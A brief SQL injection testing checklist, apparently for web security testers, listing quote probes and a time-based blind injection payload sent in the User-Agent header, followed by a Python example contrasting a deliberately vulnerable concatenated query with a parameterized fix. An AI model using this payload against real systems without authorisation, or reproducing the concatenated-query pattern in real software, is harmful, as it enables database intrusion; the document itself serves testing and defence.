Find hidden parameters
Add ' or " to the parameter value
'XOR(if(now()=sysdate(),sleep(5*5),0))OR' (sleeps for 25 seconds; sent in the User-Agent header)
Test all parameters, just as you would for XSS
Test for SQL injection in the URL
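
Why the quote and User-Agent checks above find anything, and what the fix looks like, as an added example that is not part of the original checklist. It assumes an application that logs the User-Agent header to a database; in-memory SQLite stands in for that database, and the visits table and function names are hypothetical.

```python
import sqlite3

# Constructed sample header values: a normal browser string, a bare quote,
# and the time-based probe quoted in the checklist above.
SAMPLE_USER_AGENTS = [
    "Mozilla/5.0 (X11; Linux x86_64)",
    "Mozilla/5.0'",
    "'XOR(if(now()=sysdate(),sleep(5*5),0))OR'",
]

def make_db():
    # Assumption: in-memory SQLite stands in for the application's database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visits (path TEXT, user_agent TEXT)")
    return db

def log_visit_unsafe(db, path, user_agent):
    # Vulnerable: header text is pasted into the SQL statement itself.
    sql = "INSERT INTO visits (path, user_agent) VALUES ('%s', '%s')" % (path, user_agent)
    db.execute(sql)

def log_visit_safe(db, path, user_agent):
    # Hardened: placeholders keep the header as data, never as SQL syntax.
    db.execute("INSERT INTO visits (path, user_agent) VALUES (?, ?)", (path, user_agent))

def run(log_fn):
    """Return (stored_user_agents, error_count) after logging every sample."""
    db = make_db()
    errors = 0
    for ua in SAMPLE_USER_AGENTS:
        try:
            log_fn(db, "/index", ua)
        except sqlite3.Error:
            errors += 1  # the quote changed the structure of the statement
    rows = db.execute("SELECT user_agent FROM visits ORDER BY rowid")
    return [row[0] for row in rows], errors

if __name__ == "__main__":
    for fn in (log_visit_unsafe, log_visit_safe):
        stored, errors = run(fn)
        print(fn.__name__, "stored:", len(stored), "errors:", errors)
```

With the concatenated query, both quoted values break the statement; with placeholders, all three are stored verbatim as inert text.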